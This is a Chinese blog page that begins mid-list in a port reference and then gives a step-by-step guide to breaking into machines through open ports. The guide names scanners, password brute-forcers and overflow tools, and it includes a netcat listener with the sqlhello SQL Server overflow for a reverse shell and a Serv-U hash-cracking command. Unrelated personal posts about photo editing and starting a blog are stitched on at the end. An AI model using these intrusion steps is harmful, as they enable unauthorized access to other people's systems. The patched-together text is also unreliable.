　　说明：Microsoft的SQL服务开放的端口。

　　端口：1492
　　服务：stone-design-1
　　说明：木马FTP99CMP开放此端口。

　　端口：1500
　　服务：RPC client fixed port session queries
　　说明：RPC客户固定端口会话查询

　　端口：1503
　　服务：NetMeeting T.120
　　说明：NetMeeting T.120

　　端口：1524
　　服务：ingress
　　说明：许多攻击脚本将安装一个后门SHELL于这个端口，尤其是针对SUN系统中Sendmail和RPC服务漏洞的脚本。如果刚安装了防火墙就看到在这个端口上的连接企图，很可能是上述原因。可以试试Telnet到用户的计算机上的这个端口，看看它是否会给你一个SHELL。连接到600/pcserver也存在这个问题。


常用端口利用

1. 1433端口入侵
scanport.exe 查有1433的机器
SQLScanPass.exe 进行字典暴破（字典是关键）
最后 SQLTools.exe入侵
=============================
对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口
（以上反向的，测试成功）
sqlhelloz.exe 入侵ip 1433 （这个是正向连接）

2. 4899端口入侵
用4899过滤器.exe，扫描空口令的机器

3. 3899的入侵
对很早的机器，可以试试3389的溢出(win3389ex.exe)
对2000的机器，可以试试字典暴破。(tscrack.exe)

4. 80入侵
对sp3以前的机器，可以用webdav入侵；
对bbs论坛，可以试试上传漏洞（upfile.exe或dvup_delphi.exe）
可以利用SQL进行注入。（小榕的注入软件）。

5. serv-u入侵(21端口）
对5. 004及以下系统，可用溢出入侵。（serv5004.exe）
对5.1.0.0及以下系统，可用本地提升权限。（servlocal.exe）
======================================
对serv-u的MD5加密密码，可以用字典暴破。（crack.vbs）
输入一个被serv-u加密的密码（34位长），通过与字典档（dict.txt）的比较，得到密码。如：cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A

6. 554端口
用real554.exe入侵。

7. 6129端口
用DameWare6129.exe入侵。

8. 系统漏洞
利用135、445端口，用ms03026、ms03039、ms03049、ms04011漏洞，
进行溢出入侵。

9. 3127等端口
可以利用doom病毒开的端口，用nodoom.exe入侵。（可用mydoomscan.exe查）。

10. 其他入侵
利用shanlu的入侵软件入侵（WINNTAutoAttack.exe）。

我自己做了,作业放在学习与实践分类里

效果不是很好.用了三张图片,一张是我用摄象头照的自己,一张背景,一张月亮是从BAIDU搜的.

第一次,还算成功吧,继续努力.

融图 此教程可以从本站找到.

这次似乎决心挺大,花了点时间来建这个BLOG,从选程序,到选空间.
最终定下BO-BLOG和FREEHOSTIA.
希望他们好用,也希望自己真正能写一些东西,更重要的是学到些东西.